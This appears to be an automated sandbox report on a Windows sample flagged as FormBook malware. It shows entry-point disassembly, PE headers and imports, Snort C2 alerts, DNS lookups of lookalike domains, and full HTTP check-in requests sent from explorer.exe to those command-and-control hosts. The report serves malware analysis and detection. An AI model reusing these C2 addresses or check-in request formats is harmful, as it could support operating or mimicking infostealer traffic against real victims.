push edi
mov dword ptr [esp+18h], ebx
mov dword ptr [esp+10h], 00409158h
xor esi, esi
mov byte ptr [esp+14h], 00000020h
call dword ptr [00407030h]
push 00008001h
call dword ptr [004070B0h]
push ebx
call dword ptr [0040727Ch]
push 00000008h
mov dword ptr [0042EC18h], eax
call 00007F3DCCE735B8h
mov dword ptr [0042EB64h], eax
push ebx
lea eax, dword ptr [esp+34h]
push 00000160h
push eax
push ebx
push 00428F90h
call dword ptr [00407158h]
push 0040914Ch
push 0042E360h
call 00007F3DCCE7326Fh
call dword ptr [004070ACh]
mov edi, 00434000h
push eax
push edi
call 00007F3DCCE7325Dh
push ebx
call dword ptr [0040710Ch]
cmp byte ptr [00434000h], 00000022h
mov dword ptr [0042EB60h], eax
mov eax, edi
jne 00007F3DCCE70A9Ch
mov byte ptr [esp+14h], 00000022h
mov eax, 00434001h
push dword ptr [esp+14h]
push eax
call 00007F3DCCE72D50h
push eax
call dword ptr [0040721Ch]
mov dword ptr [esp+1Ch], eax
jmp 00007F3DCCE70AF5h
cmp cl, 00000020h
jne 00007F3DCCE70A98h
inc eax
cmp byte ptr [eax], 00000020h
je 00007F3DCCE70A8Ch
cmp byte ptr [eax], 00000022h
mov byte ptr [eax+eax+00h], 00000000h

Rich Headers

Programming Language:

[EXP] VC++ 6.0 SP5 build 8804

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IMPORT	0x74b0	0xb4	.rdata
IMAGE_DIRECTORY_ENTRY_RESOURCE	0x37000	0x900	.rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC	0x0	0x0
IMAGE_DIRECTORY_ENTRY_DEBUG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x0	0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0x7000	0x28c	.rdata
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
.text	0x1000	0x5b68	0x5c00	False	0.67722486413	data	6.48746502716	IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
.rdata	0x7000	0x129c	0x1400	False	0.4337890625	data	5.04904254867	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.data	0x9000	0x25c58	0x400	False	0.58203125	data	4.76995537906	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ
.ndata	0x2f000	0x8000	0x0	False	0	empty	0.0	IMAGE_SCN_MEM_WRITE, IMAGE_SCN_CNT_UNINITIALIZED_DATA, IMAGE_SCN_MEM_READ
.rsrc	0x37000	0x900	0xa00	False	0.4078125	data	3.93441125971	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ

Resources

Name	RVA	Size	Type	Language	Country
RT_ICON	0x37190	0x2e8	data	English	United States
RT_DIALOG	0x37478	0x100	data	English	United States
RT_DIALOG	0x37578	0x11c	data	English	United States
RT_DIALOG	0x37698	0x60	data	English	United States
RT_GROUP_ICON	0x376f8	0x14	data	English	United States
RT_MANIFEST	0x37710	0x1eb	XML 1.0 document, ASCII text, with very long lines, with no line terminators	English	United States

Imports

DLL	Import
KERNEL32.dll	CompareFileTime, SearchPathA, GetShortPathNameA, GetFullPathNameA, MoveFileA, SetCurrentDirectoryA, GetFileAttributesA, GetLastError, CreateDirectoryA, SetFileAttributesA, Sleep, GetTickCount, GetFileSize, GetModuleFileNameA, GetCurrentProcess, CopyFileA, ExitProcess, GetWindowsDirectoryA, SetFileTime, GetCommandLineA, SetErrorMode, LoadLibraryA, lstrcpynA, GetDiskFreeSpaceA, GlobalUnlock, GlobalLock, CreateThread, CreateProcessA, RemoveDirectoryA, CreateFileA, GetTempFileNameA, lstrlenA, lstrcatA, GetSystemDirectoryA, GetVersion, CloseHandle, lstrcmpiA, lstrcmpA, ExpandEnvironmentStringsA, GlobalFree, GlobalAlloc, WaitForSingleObject, GetExitCodeProcess, GetModuleHandleA, LoadLibraryExA, GetProcAddress, FreeLibrary, MultiByteToWideChar, WritePrivateProfileStringA, GetPrivateProfileStringA, WriteFile, ReadFile, MulDiv, SetFilePointer, FindClose, FindNextFileA, FindFirstFileA, DeleteFileA, GetTempPathA
USER32.dll	EndDialog, ScreenToClient, GetWindowRect, EnableMenuItem, GetSystemMenu, SetClassLongA, IsWindowEnabled, SetWindowPos, GetSysColor, GetWindowLongA, SetCursor, LoadCursorA, CheckDlgButton, GetMessagePos, LoadBitmapA, CallWindowProcA, IsWindowVisible, CloseClipboard, SetClipboardData, EmptyClipboard, RegisterClassA, TrackPopupMenu, AppendMenuA, CreatePopupMenu, GetSystemMetrics, SetDlgItemTextA, GetDlgItemTextA, MessageBoxIndirectA, CharPrevA, DispatchMessageA, PeekMessageA, DestroyWindow, CreateDialogParamA, SetTimer, SetWindowTextA, PostQuitMessage, SetForegroundWindow, wsprintfA, SendMessageTimeoutA, FindWindowExA, SystemParametersInfoA, CreateWindowExA, GetClassInfoA, DialogBoxParamA, CharNextA, OpenClipboard, ExitWindowsEx, IsWindow, GetDlgItem, SetWindowLongA, LoadImageA, GetDC, EnableWindow, InvalidateRect, SendMessageA, DefWindowProcA, BeginPaint, GetClientRect, FillRect, DrawTextA, EndPaint, ShowWindow
GDI32.dll	SetBkColor, GetDeviceCaps, DeleteObject, CreateBrushIndirect, CreateFontIndirectA, SetBkMode, SetTextColor, SelectObject
SHELL32.dll	SHGetPathFromIDListA, SHBrowseForFolderA, SHGetFileInfoA, ShellExecuteA, SHFileOperationA, SHGetSpecialFolderLocation
ADVAPI32.dll	RegQueryValueExA, RegSetValueExA, RegEnumKeyA, RegEnumValueA, RegOpenKeyExA, RegDeleteKeyA, RegDeleteValueA, RegCloseKey, RegCreateKeyExA
COMCTL32.dll	ImageList_AddMasked, ImageList_Destroy, ImageList_Create
ole32.dll	CoTaskMemFree, OleInitialize, OleUninitialize, CoCreateInstance
VERSION.dll	GetFileVersionInfoSizeA, GetFileVersionInfoA, VerQueryValueA

Possible Origin

Language of compilation system	Country where language is spoken	Map
English	United States

Network Behavior

Snort IDS Alerts

Timestamp	Protocol	SID	Message	Source Port	Dest Port	Source IP	Dest IP
11/25/21-14:52:25.627974	TCP	2031453	ET TROJAN FormBook CnC Checkin (GET)	49835	80	192.168.2.4	185.53.178.54
11/25/21-14:52:25.627974	TCP	2031449	ET TROJAN FormBook CnC Checkin (GET)	49835	80	192.168.2.4	185.53.178.54
11/25/21-14:52:25.627974	TCP	2031412	ET TROJAN FormBook CnC Checkin (GET)	49835	80	192.168.2.4	185.53.178.54
11/25/21-14:52:25.644872	TCP	1201	ATTACK-RESPONSES 403 Forbidden	80	49835	185.53.178.54	192.168.2.4
11/25/21-14:52:49.935941	TCP	2031453	ET TROJAN FormBook CnC Checkin (GET)	49857	80	192.168.2.4	34.102.136.180
11/25/21-14:52:49.935941	TCP	2031449	ET TROJAN FormBook CnC Checkin (GET)	49857	80	192.168.2.4	34.102.136.180
11/25/21-14:52:49.935941	TCP	2031412	ET TROJAN FormBook CnC Checkin (GET)	49857	80	192.168.2.4	34.102.136.180
11/25/21-14:52:50.116125	TCP	1201	ATTACK-RESPONSES 403 Forbidden	80	49857	34.102.136.180	192.168.2.4
11/25/21-14:53:10.721504	TCP	1201	ATTACK-RESPONSES 403 Forbidden	80	49858	34.102.136.180	192.168.2.4
11/25/21-14:54:13.962247	TCP	1201	ATTACK-RESPONSES 403 Forbidden	80	49886	15.197.142.173	192.168.2.4

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Nov 25, 2021 14:52:25.593249083 CET	49835	80	192.168.2.4	185.53.178.54
Nov 25, 2021 14:52:25.610764027 CET	80	49835	185.53.178.54	192.168.2.4
Nov 25, 2021 14:52:25.610939980 CET	49835	80	192.168.2.4	185.53.178.54
Nov 25, 2021 14:52:25.627885103 CET	80	49835	185.53.178.54	192.168.2.4
Nov 25, 2021 14:52:25.627974033 CET	49835	80	192.168.2.4	185.53.178.54
Nov 25, 2021 14:52:25.644807100 CET	80	49835	185.53.178.54	192.168.2.4
Nov 25, 2021 14:52:25.644871950 CET	80	49835	185.53.178.54	192.168.2.4
Nov 25, 2021 14:52:25.644906044 CET	80	49835	185.53.178.54	192.168.2.4
Nov 25, 2021 14:52:25.645076990 CET	49835	80	192.168.2.4	185.53.178.54
Nov 25, 2021 14:52:25.645139933 CET	49835	80	192.168.2.4	185.53.178.54
Nov 25, 2021 14:52:25.662167072 CET	80	49835	185.53.178.54	192.168.2.4
Nov 25, 2021 14:52:49.914163113 CET	49857	80	192.168.2.4	34.102.136.180
Nov 25, 2021 14:52:49.935576916 CET	80	49857	34.102.136.180	192.168.2.4
Nov 25, 2021 14:52:49.935677052 CET	49857	80	192.168.2.4	34.102.136.180
Nov 25, 2021 14:52:49.935940981 CET	49857	80	192.168.2.4	34.102.136.180
Nov 25, 2021 14:52:49.957304955 CET	80	49857	34.102.136.180	192.168.2.4
Nov 25, 2021 14:52:50.116125107 CET	80	49857	34.102.136.180	192.168.2.4
Nov 25, 2021 14:52:50.116147041 CET	80	49857	34.102.136.180	192.168.2.4
Nov 25, 2021 14:52:50.116307020 CET	49857	80	192.168.2.4	34.102.136.180
Nov 25, 2021 14:52:50.116378069 CET	49857	80	192.168.2.4	34.102.136.180
Nov 25, 2021 14:52:50.424767971 CET	49857	80	192.168.2.4	34.102.136.180
Nov 25, 2021 14:52:50.446846962 CET	80	49857	34.102.136.180	192.168.2.4
Nov 25, 2021 14:53:10.579292059 CET	49858	80	192.168.2.4	34.102.136.180
Nov 25, 2021 14:53:10.600778103 CET	80	49858	34.102.136.180	192.168.2.4
Nov 25, 2021 14:53:10.601003885 CET	49858	80	192.168.2.4	34.102.136.180
Nov 25, 2021 14:53:10.601125956 CET	49858	80	192.168.2.4	34.102.136.180
Nov 25, 2021 14:53:10.624130964 CET	80	49858	34.102.136.180	192.168.2.4
Nov 25, 2021 14:53:10.721503973 CET	80	49858	34.102.136.180	192.168.2.4
Nov 25, 2021 14:53:10.721537113 CET	80	49858	34.102.136.180	192.168.2.4
Nov 25, 2021 14:53:10.721827984 CET	49858	80	192.168.2.4	34.102.136.180
Nov 25, 2021 14:53:10.721863031 CET	49858	80	192.168.2.4	34.102.136.180
Nov 25, 2021 14:53:10.743427038 CET	80	49858	34.102.136.180	192.168.2.4
Nov 25, 2021 14:53:31.141864061 CET	49859	80	192.168.2.4	5.9.96.94
Nov 25, 2021 14:53:31.165460110 CET	80	49859	5.9.96.94	192.168.2.4
Nov 25, 2021 14:53:31.167774916 CET	49859	80	192.168.2.4	5.9.96.94
Nov 25, 2021 14:53:31.168188095 CET	49859	80	192.168.2.4	5.9.96.94
Nov 25, 2021 14:53:31.191728115 CET	80	49859	5.9.96.94	192.168.2.4
Nov 25, 2021 14:53:31.192174911 CET	80	49859	5.9.96.94	192.168.2.4
Nov 25, 2021 14:53:31.192188978 CET	80	49859	5.9.96.94	192.168.2.4
Nov 25, 2021 14:53:31.192384958 CET	49859	80	192.168.2.4	5.9.96.94
Nov 25, 2021 14:53:31.192415953 CET	49859	80	192.168.2.4	5.9.96.94
Nov 25, 2021 14:53:31.216013908 CET	80	49859	5.9.96.94	192.168.2.4
Nov 25, 2021 14:53:51.488311052 CET	49866	80	192.168.2.4	142.250.203.115
Nov 25, 2021 14:53:51.504972935 CET	80	49866	142.250.203.115	192.168.2.4
Nov 25, 2021 14:53:51.505177975 CET	49866	80	192.168.2.4	142.250.203.115
Nov 25, 2021 14:53:51.505518913 CET	49866	80	192.168.2.4	142.250.203.115
Nov 25, 2021 14:53:51.521971941 CET	80	49866	142.250.203.115	192.168.2.4
Nov 25, 2021 14:53:51.537875891 CET	80	49866	142.250.203.115	192.168.2.4
Nov 25, 2021 14:53:51.537944078 CET	80	49866	142.250.203.115	192.168.2.4
Nov 25, 2021 14:53:51.538062096 CET	49866	80	192.168.2.4	142.250.203.115
Nov 25, 2021 14:53:51.538096905 CET	49866	80	192.168.2.4	142.250.203.115
Nov 25, 2021 14:53:51.555473089 CET	80	49866	142.250.203.115	192.168.2.4
Nov 25, 2021 14:54:13.745102882 CET	49886	80	192.168.2.4	15.197.142.173
Nov 25, 2021 14:54:13.763974905 CET	80	49886	15.197.142.173	192.168.2.4
Nov 25, 2021 14:54:13.764084101 CET	49886	80	192.168.2.4	15.197.142.173
Nov 25, 2021 14:54:13.764236927 CET	49886	80	192.168.2.4	15.197.142.173
Nov 25, 2021 14:54:13.785028934 CET	80	49886	15.197.142.173	192.168.2.4
Nov 25, 2021 14:54:13.962246895 CET	80	49886	15.197.142.173	192.168.2.4
Nov 25, 2021 14:54:13.968039036 CET	80	49886	15.197.142.173	192.168.2.4
Nov 25, 2021 14:54:13.968991041 CET	49886	80	192.168.2.4	15.197.142.173
Nov 25, 2021 14:54:14.217559099 CET	49886	80	192.168.2.4	15.197.142.173
Nov 25, 2021 14:54:14.236651897 CET	80	49886	15.197.142.173	192.168.2.4

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Nov 25, 2021 14:52:25.556238890 CET	52337	53	192.168.2.4	8.8.8.8
Nov 25, 2021 14:52:25.589087963 CET	53	52337	8.8.8.8	192.168.2.4
Nov 25, 2021 14:52:49.875273943 CET	55046	53	192.168.2.4	8.8.8.8
Nov 25, 2021 14:52:49.913043976 CET	53	55046	8.8.8.8	192.168.2.4
Nov 25, 2021 14:53:10.516654968 CET	49612	53	192.168.2.4	8.8.8.8
Nov 25, 2021 14:53:10.577569008 CET	53	49612	8.8.8.8	192.168.2.4
Nov 25, 2021 14:53:31.116332054 CET	49285	53	192.168.2.4	8.8.8.8
Nov 25, 2021 14:53:31.137038946 CET	53	49285	8.8.8.8	192.168.2.4
Nov 25, 2021 14:53:51.348086119 CET	50601	53	192.168.2.4	8.8.8.8
Nov 25, 2021 14:53:51.486010075 CET	53	50601	8.8.8.8	192.168.2.4
Nov 25, 2021 14:54:13.713430882 CET	60875	53	192.168.2.4	8.8.8.8
Nov 25, 2021 14:54:13.744256020 CET	53	60875	8.8.8.8	192.168.2.4
Nov 25, 2021 14:54:34.396709919 CET	56448	53	192.168.2.4	8.8.8.8
Nov 25, 2021 14:54:34.434103966 CET	53	56448	8.8.8.8	192.168.2.4

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class
Nov 25, 2021 14:52:25.556238890 CET	192.168.2.4	8.8.8.8	0x67f1	Standard query (0)	www.comptesgratuit.fr	A (IP address)	IN (0x0001)
Nov 25, 2021 14:52:49.875273943 CET	192.168.2.4	8.8.8.8	0x3d3a	Standard query (0)	www.evchargeoracle.com	A (IP address)	IN (0x0001)
Nov 25, 2021 14:53:10.516654968 CET	192.168.2.4	8.8.8.8	0x5e5c	Standard query (0)	www.meta-facebook.life	A (IP address)	IN (0x0001)
Nov 25, 2021 14:53:31.116332054 CET	192.168.2.4	8.8.8.8	0x77cf	Standard query (0)	www.schuette.tech	A (IP address)	IN (0x0001)
Nov 25, 2021 14:53:51.348086119 CET	192.168.2.4	8.8.8.8	0x6995	Standard query (0)	www.teslaislandboys.com	A (IP address)	IN (0x0001)
Nov 25, 2021 14:54:13.713430882 CET	192.168.2.4	8.8.8.8	0xe248	Standard query (0)	www.facebook-meta.net	A (IP address)	IN (0x0001)
Nov 25, 2021 14:54:34.396709919 CET	192.168.2.4	8.8.8.8	0x92ad	Standard query (0)	www.chasesecurobanking.com	A (IP address)	IN (0x0001)

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	CName	Address	Type	Class
Nov 25, 2021 14:52:25.589087963 CET	8.8.8.8	192.168.2.4	0x67f1	No error (0)	www.comptesgratuit.fr		185.53.178.54	A (IP address)	IN (0x0001)
Nov 25, 2021 14:52:49.913043976 CET	8.8.8.8	192.168.2.4	0x3d3a	No error (0)	www.evchargeoracle.com	evchargeoracle.com		CNAME (Canonical name)	IN (0x0001)
Nov 25, 2021 14:52:49.913043976 CET	8.8.8.8	192.168.2.4	0x3d3a	No error (0)	evchargeoracle.com		34.102.136.180	A (IP address)	IN (0x0001)
Nov 25, 2021 14:53:10.577569008 CET	8.8.8.8	192.168.2.4	0x5e5c	No error (0)	www.meta-facebook.life	meta-facebook.life		CNAME (Canonical name)	IN (0x0001)
Nov 25, 2021 14:53:10.577569008 CET	8.8.8.8	192.168.2.4	0x5e5c	No error (0)	meta-facebook.life		34.102.136.180	A (IP address)	IN (0x0001)
Nov 25, 2021 14:53:31.137038946 CET	8.8.8.8	192.168.2.4	0x77cf	No error (0)	www.schuette.tech		5.9.96.94	A (IP address)	IN (0x0001)
Nov 25, 2021 14:53:31.137038946 CET	8.8.8.8	192.168.2.4	0x77cf	No error (0)	www.schuette.tech		192.64.119.127	A (IP address)	IN (0x0001)
Nov 25, 2021 14:53:51.486010075 CET	8.8.8.8	192.168.2.4	0x6995	No error (0)	www.teslaislandboys.com	ghs.googlehosted.com		CNAME (Canonical name)	IN (0x0001)
Nov 25, 2021 14:53:51.486010075 CET	8.8.8.8	192.168.2.4	0x6995	No error (0)	ghs.googlehosted.com		142.250.203.115	A (IP address)	IN (0x0001)
Nov 25, 2021 14:54:13.744256020 CET	8.8.8.8	192.168.2.4	0xe248	No error (0)	www.facebook-meta.net	facebook-meta.net		CNAME (Canonical name)	IN (0x0001)
Nov 25, 2021 14:54:13.744256020 CET	8.8.8.8	192.168.2.4	0xe248	No error (0)	facebook-meta.net		15.197.142.173	A (IP address)	IN (0x0001)
Nov 25, 2021 14:54:13.744256020 CET	8.8.8.8	192.168.2.4	0xe248	No error (0)	facebook-meta.net		3.33.152.147	A (IP address)	IN (0x0001)
Nov 25, 2021 14:54:34.434103966 CET	8.8.8.8	192.168.2.4	0x92ad	Name error (3)	www.chasesecurobanking.com	none	none	A (IP address)	IN (0x0001)

HTTP Request Dependency Graph

www.comptesgratuit.fr

www.evchargeoracle.com

www.meta-facebook.life

www.schuette.tech

www.teslaislandboys.com

www.facebook-meta.net

HTTP Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
0	192.168.2.4	49835	185.53.178.54	80	C:\Windows\explorer.exe

Timestamp	kBytes transferred	Direction	Data
Nov 25, 2021 14:52:25.627974033 CET	13280	OUT	GET /fh3c/?7nhH=Hxl0d2MH-t9Hyv&z0GdXd=ygpAwtep7WxWCgU1n5iY5amVcELu0tSIdE/9Y9Jyy4nkdNu97XXXbghTbpjnrxNYSyQT HTTP/1.1 Host: www.comptesgratuit.fr Connection: close Data Raw: 00 00 00 00 00 00 00 Data Ascii:
Nov 25, 2021 14:52:25.644871950 CET	13280	IN	HTTP/1.1 403 Forbidden Server: nginx Date: Thu, 25 Nov 2021 13:52:25 GMT Content-Type: text/html Content-Length: 146 Connection: close Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>403 Forbidden</title></head><body><center><h1>403 Forbidden</h1></center><hr><center>nginx</center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
1	192.168.2.4	49857	34.102.136.180	80	C:\Windows\explorer.exe

Timestamp	kBytes transferred	Direction	Data
Nov 25, 2021 14:52:49.935940981 CET	13953	OUT	GET /fh3c/?z0GdXd=TEDmW6iEX7An5lAq1gB0cQiS4L3buUHqtO3o3qqMncoo4GVsMboScKfxnSemig/wshnV&7nhH=Hxl0d2MH-t9Hyv HTTP/1.1 Host: www.evchargeoracle.com Connection: close Data Raw: 00 00 00 00 00 00 00 Data Ascii:
Nov 25, 2021 14:52:50.116125107 CET	13954	IN	HTTP/1.1 403 Forbidden Server: openresty Date: Thu, 25 Nov 2021 13:52:50 GMT Content-Type: text/html Content-Length: 275 ETag: "618be74a-113" Via: 1.1 google Connection: close Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 68 6f 72 74 63 75 74 20 69 63 6f 6e 22 20 68 72 65 66 3d 22 64 61 74 61 3a 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 3b 2c 22 20 74 79 70 65 3d 22 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 22 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 68 31 3e 41 63 63 65 73 73 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE html><html lang="en"><head> <meta http-equiv="content-type" content="text/html;charset=utf-8"> <link rel="shortcut icon" href="data:image/x-icon;," type="image/x-icon"> <title>Forbidden</title></head><body><h1>Access Forbidden</h1></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
2	192.168.2.4	49858	34.102.136.180	80	C:\Windows\explorer.exe

Timestamp	kBytes transferred	Direction	Data
Nov 25, 2021 14:53:10.601125956 CET	13955	OUT	GET /fh3c/?7nhH=Hxl0d2MH-t9Hyv&z0GdXd=tXPHdmDKONGhRVqCA0IZHOyO0PTL+BRkpbdAk/iYV8rKicqHrA4rokXZ0wK7+ll/WvZA HTTP/1.1 Host: www.meta-facebook.life Connection: close Data Raw: 00 00 00 00 00 00 00 Data Ascii:
Nov 25, 2021 14:53:10.721503973 CET	13955	IN	HTTP/1.1 403 Forbidden Server: openresty Date: Thu, 25 Nov 2021 13:53:10 GMT Content-Type: text/html Content-Length: 275 ETag: "6192576d-113" Via: 1.1 google Connection: close Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 68 6f 72 74 63 75 74 20 69 63 6f 6e 22 20 68 72 65 66 3d 22 64 61 74 61 3a 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 3b 2c 22 20 74 79 70 65 3d 22 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 22 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 68 31 3e 41 63 63 65 73 73 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE html><html lang="en"><head> <meta http-equiv="content-type" content="text/html;charset=utf-8"> <link rel="shortcut icon" href="data:image/x-icon;," type="image/x-icon"> <title>Forbidden</title></head><body><h1>Access Forbidden</h1></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
3	192.168.2.4	49859	5.9.96.94	80	C:\Windows\explorer.exe

Timestamp	kBytes transferred	Direction	Data
Nov 25, 2021 14:53:31.168188095 CET	13956	OUT	GET /fh3c/?z0GdXd=N2vEI1OX7w/3udy+ydCYc971PZER2FJlK1gZL6lMnGSu15qwd848spLio4s8j+VNLmhX&7nhH=Hxl0d2MH-t9Hyv HTTP/1.1 Host: www.schuette.tech Connection: close Data Raw: 00 00 00 00 00 00 00 Data Ascii:
Nov 25, 2021 14:53:31.192174911 CET	13957	IN	HTTP/1.1 404 Not Found Server: nginx/1.18.0 (Ubuntu) Date: Thu, 25 Nov 2021 13:53:31 GMT Content-Type: text/html Content-Length: 162 Connection: close Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 38 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx/1.18.0 (Ubuntu)</center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
4	192.168.2.4	49866	142.250.203.115	80	C:\Windows\explorer.exe

Timestamp	kBytes transferred	Direction	Data
Nov 25, 2021 14:53:51.505518913 CET	16022	OUT	GET /fh3c/?7nhH=Hxl0d2MH-t9Hyv&z0GdXd=n2wKPxZ8pCyDi97rnXro6S5Jba3+KYmZJcqoataOVa/Ib+/xmeU19xREWNmNK15lIZxN HTTP/1.1 Host: www.teslaislandboys.com Connection: close Data Raw: 00 00 00 00 00 00 00 Data Ascii:
Nov 25, 2021 14:53:51.537875891 CET	16042	IN	HTTP/1.1 302 Found Location: http://cirn.one Date: Thu, 25 Nov 2021 13:53:51 GMT Content-Type: text/html; charset=UTF-8 Server: ghs Content-Length: 212 X-XSS-Protection: 0 X-Frame-Options: SAMEORIGIN Connection: close Data Raw: 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 3c 54 49 54 4c 45 3e 33 30 32 20 4d 6f 76 65 64 3c 2f 54 49 54 4c 45 3e 3c 2f 48 45 41 44 3e 3c 42 4f 44 59 3e 0a 3c 48 31 3e 33 30 32 20 4d 6f 76 65 64 3c 2f 48 31 3e 0a 54 68 65 20 64 6f 63 75 6d 65 6e 74 20 68 61 73 20 6d 6f 76 65 64 0a 3c 41 20 48 52 45 46 3d 22 68 74 74 70 3a 2f 2f 63 69 72 6e 2e 6f 6e 65 22 3e 68 65 72 65 3c 2f 41 3e 2e 0d 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0d 0a Data Ascii: <HTML><HEAD><meta http-equiv="content-type" content="text/html;charset=utf-8"><TITLE>302 Moved</TITLE></HEAD><BODY><H1>302 Moved</H1>The document has moved<A HREF="http://cirn.one">here</A>.</BODY></HTML>

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
5	192.168.2.4	49886	15.197.142.173	80	C:\Windows\explorer.exe

Timestamp	kBytes transferred	Direction	Data
Nov 25, 2021 14:54:13.764236927 CET	16834	OUT	GET /fh3c/?z0GdXd=WoHcE9GCxXT7wUBgkc+2l4Z3+m1n5nn1xCnIHBmko3viCo3Igm4+Oh54SxcB0NGJBR7p&7nhH=Hxl0d2MH-t9Hyv HTTP/1.1 Host: www.facebook-meta.net Connection: close Data Raw: 00 00 00 00 00 00 00 Data Ascii:
